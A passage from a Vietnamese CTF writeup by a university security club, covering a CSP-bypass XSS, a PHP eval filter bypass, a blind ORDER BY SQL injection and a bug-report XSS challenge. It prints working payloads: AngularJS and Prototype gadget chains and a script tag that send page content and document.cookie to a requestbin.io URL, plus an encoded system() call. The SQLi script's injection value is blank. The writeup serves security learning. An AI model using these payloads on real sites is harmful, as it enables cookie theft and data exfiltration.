bài này thì có source nên mình xác định được goal từ đầu xss bypass csp :v mình giải thích sơ về cách hoạt động của app như sau. mỗi lần mình submit feadback thì nó sẽ lưu vào db đồng thời gọi bot. ở route list ta thấy chỉ có thể access từ local hay nói cách khác chỉ bot mới có quyền access, bot access /list tức ta phải trigger xss ở đây. take a look to csp script-src https://cdnjs.cloudflare.com/ quen quá :v https://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5d sau khi chỉnh một chút để phù hợp với chall thì đây là payload cuối cùng của mình

<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 <div ng-app ng-csp>
 {{ x = $on.curry.call().eval("fetch('/alien').then(function(response) {return response.text().then(function(text) {document.location='https://requestbin.io/1744lkl1?q='+btoa(unescape(encodeURIComponent(text.slice(0, text.length / 6))))});});") }}
 </div>

vì csp chặn không cho fetch ra bên ngoài, nên mình sẽ phải sử dụng document.location và hơn nữa content của file alien.html quá dài nên mình phải cắt bớt để phù hợp với độ dài ở url.

7. pcalc

với những người chơi ctf thường xuyên thì đọc đề biết ngay liên quan tới eval với source được cấp mình sẽ tập trung focus chủ yếu vào đây. thấy tối đa 100 char, đồng thời không được sử dụng a-z'" đọc tới đây mình biết cách giải luôn là sử dụng ~ call được phpinfo thì call được system? right? không hiểu sao khi sử dụng payload này thì mình lại không work, nên mình quyết định xài no space bằng toán tử $IFS thì work payload cuối (~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DB%84%B6%B9%AC%82%D0%D5) với những bài eval vơi blacklist lỏng lẻo như thế này thì mình nghĩ sẽ có nhiều hướng, hướng tiếp theo mình gợi ý là sử dụng blacktic cộng với octa sử dụng blacktic kết hợp với eval để chạy thẳng bash cmd ở đây.

8. emoji voting

những bài có source như thế này thì mình khá thích vì mình có thể biết được mình đang đối mặt với thứ gì và đồng thời biết được mục tiêu của mình biết người biết ta trăm trận trăm thắng nhìn qua một lượt flag ở trong table flag_random ta có 2 query dễ thấy query thứ 2 được truyền thẳng vào mà không có bất kỳ bộ lọc nào. nên ta có thế sqli ở getEmojis query chỗ mình control được là ở mệnh đề order by mình sẽ khẳng định đây là một bài blind search một lúc thì thấy một trang như sau https://portswigger.net/support/sql-injection-in-the-query-structure có cấu trúc rồi làm thôi. đây là script cuối cùng của mình

import requests

url = "http://188.166.156.37:32565/api/list"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Content-type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0"}
flag="CHTB{order_me_this_juicy_info}"
flag=""
for i in range(20,50):
  print(i)
  for j in range(32,128):
    #print(chr(j))
    data = {"order": f" "}
    r=requests.post(url, headers=headers, data=data)
    a=r.text
    if a.startswith('''[{"id":1'''):
      flag+=chr(j)
      print("flag:"+flag)
      print(r.text,data)
      break

9. bug report

bài xss này gồm chủ yếu file đó là app.py và bot.py app.py làm nhiệm vụ nhận url của mình truyền vào và gọi tới bot.py behavior của bot như sau đầu tiên set cookie là flag và get tới localhost, sau đó mới get tới url mà mình control vì đây là một header chromeless nên nó có thể thực thi bất kỳ js nào, nhưng vì cors nên không thể nào lấy được cookie từ trang web trước đó được request, cụ thể ở đây là localhost. stuck một lúc thì mình nhìn lại app.py đúng là ctf lừa nhau là chủ yếu mà ta có thể trigger xss ở đây đến đây thì ez rồi, flag đc set ở cookie local, mà đồng thời ta có thể triger xss ở local => get flag so simple http://127.0.0.1:1337/<script>fetch("https://requestbin.io/15qgycy1/"+document.cookie,{mode:'no-cors'})</script>

TIN LIÊN QUAN
CLB An toàn Thông tin Wanna.W^n chia sẻ một số Challenges giải được và việc chia sẻ writeup nhằm mục đích giao lưu học thuật. Mọi đóng-góp ý-kiến bọn mình luôn-luôn tiếp nhận qua mail: wannaone.uit@gmail.com hoặc inseclab@uit.edu.vn và fanpage: fb.com/inseclab Cám ơn các thành viên Wanna.W^N @InSecLab đã đóng...
Trong bài viết này, CLB Wanna.W^n sẽ hướng dẫn các bạn cách sử dụng nền tảng wannaGame với các bước thực hiện như sau: Đăng ký tài khoản Bước 1: Truy cập đường dẫn nền tảng wannaGame: https://cnsc.uit.edu.vn/ctf/ Bước 2: Chọn nút Register Bước 3: Tại màn hình đăng ký,...
CLB An toàn Thông tin Wanna.One chia sẻ một số Challenges giải được và việc chia sẻ writeup nhằm mục đích giao lưu học thuật. Mọi đóng-góp ý-kiến bọn mình luôn-luôn tiếp nhận qua mail: wannaone.uit@gmail.com hoặc inseclab@uit.edu.vn và fanpage: fb.com/inseclab Web @AP DISCO PARTY @AP GITFILE EXPLORER @AP miniblog++...